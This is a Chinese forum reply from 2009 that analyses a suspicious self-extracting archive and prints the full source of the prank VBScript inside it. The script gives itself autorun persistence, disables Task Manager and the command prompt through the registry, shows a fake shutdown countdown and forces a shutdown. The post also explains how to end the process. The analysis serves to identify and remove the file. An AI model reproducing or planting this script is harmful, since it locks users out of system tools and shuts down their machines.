回复: 看一下这个是么?
原帖由 兂與倫笓 于 2009-9-5 20:24:00 发表
?????????? 金山说有毒 10版瑞星说没有 到底是有没有呢?
用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6)[/s......
这种东西,报不报毒,都行。从其注册表改动看,应该报毒。
自解压包中有一个玩笑程序————我的图片!!!.VBE。此程序须调用wscript.exe才能运行:
我的图片!!!.VBE运行后,开始吓唬人:
用IceSword参照下图结束wscript.exe进程即可:
那个我的图片!!!.VBE的内容如下:set s=createobject("wscript.shell")
set bag=getobject("winmgmts:\\.\root\cimv2")
set pipe=bag.execquery("select * from win32_process where name='wscript.exe'")
For Each id in pipe
if instr(1,id.CommandLine,wscript.scriptfullname)<>0 and pipe.count>=2 then
s.regwrite"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\","","REG_SZ"
s.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",0,"REG_DWORD"
s.regwrite"HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD",0,"REG_DWORD"
id.terminate()
else
s.regwrite"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\",wscript.scriptfullname,"REG_SZ"
s.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD"
s.regwrite"HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD",1,"REG_DWORD"
for i=1 to 60
s.popup"系统将在"& 60-i &"秒后关机...",1,"系统提示",4096+48
next
Set colOS = GetObject("winmgmts:{(Shutdown)}").ExecQuery("Select * FROM Win32_OperatingSystem")
For Each eOs In colOS
eOs.Win32Shutdown(2)
Next
end if
Next
